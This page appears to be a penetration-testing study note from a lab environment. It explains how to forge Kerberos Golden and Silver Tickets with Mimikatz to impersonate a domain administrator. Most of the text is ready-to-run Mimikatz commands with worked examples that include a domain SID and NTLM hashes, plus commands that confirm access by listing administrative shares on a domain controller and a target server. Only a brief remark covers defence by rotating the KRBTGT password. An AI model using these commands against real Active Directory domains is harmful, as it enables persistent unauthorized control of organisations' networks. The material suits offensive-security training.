Skip to main content

Golden Ticket

The example below shows how to create a Kerberos Ticket-Granting Ticket (TGT) for a User Account that doesn’t actually exist in the Directory.

With November 2021 Security Updates for Kerberos this attack method was Patched so if the Domain Controllers have this Update a Valid User must be Used.


To generate the Golden Ticket we need the NTLM Hash of the KRBTGT Account and the Domain SID.

# We can use this Command to find the Domain SID
Get-ADDomain

Once we recover the Domain SID we can load Mimikatz to generate the Golden Ticket.

:: [admin]    - Username we want to Impersonate. 
:: [domain] - FQDN of the Domain we want to generate the Ticket.
:: [id] - User RID. By Default, Mimikatz uses RID 500, which is the Default Administrator account RID.
:: [sid] - SID of the Domain we want to generate the Ticket.
:: [krbtgt] - NTLM hash of the KRBTGT Account.
:: [endin] - Ticket Lifetime. By default, Mimikatz generates a Ticket that is valid for 10 Years. The default Kerberos Policy of AD is 10 Hours (600 Minutes).
:: [renewmax] - Maximum Ticket Lifetime with Renewal. By default, Mimikatz generates a Ticket that is valid for 10 Years. The default Kerberos Policy of AD is 7 Days (10080 Minutes).
:: [ptt] - This Flag tells Mimikatz to Inject the Ticket directly into the Session, meaning it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM Hash of KRBTGT Account> /endin:600 /renewmax:10080 /ptt

:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt

We can verify that the Golden Ticket is Working by running the dir - klist Command against the Domain Controller.

:: List Domain Controller Contents
dir \\PCDC.za.adobe.loc\c$\

:: Displays a list of currently Cached Kerberos Tickets
klist

Silver Ticket

Even if the Golden Ticket has an incredibly long time, the Blue Team can still defend against this by simply rotating the KRBTGT Password Twice. The Silver Tickets are less likely to be Discovered and significantly Harder to Defend against since the Passwords of every Machine Account must be Rotated.

We can use Mimikatz to Generate a Silver Ticket.

:: [admin]   - Username we want to Impersonate.
:: [domain] - FQDN of the Domain we want to generate the Ticket.
:: [id] - User RID. By Default, Mimikatz uses RID 500, which is the Default Administrator account RID.
:: [sid] - SID of the Domain we want to generate the Ticket.
:: [target] - Hostname of the Target Server. It can be any Domain-Joined Host.
:: [rc4] - NTLM Hash of the Machine Account of our Target.
:: [service] - The Service we are Requesting in our TGS. (CIFS is a safe bet, since it allows File Access)
:: [ptt] - This Flag tells Mimikatz to Inject the Ticket directly into the Session, meaning it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /target:<Hostname of Server being Targeted> /rc4:<NTLM Hash of Machine Account of Target> /service:cifs /ptt

:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:PCMC.za.adobe.loc /rc4:4b091b72ce2eefece6494ee0f1bb874a /service:cifs /ptt

We can verify that the Golden Ticket is Working by running the dir - klist Command against the Target Machine, in this case PCMC.za.adobe.loc

:: List Target Machine Contents
dir \\PCMC.za.adobe.loc\c$\

:: Displays a list of currently Cached Kerberos Tickets
klist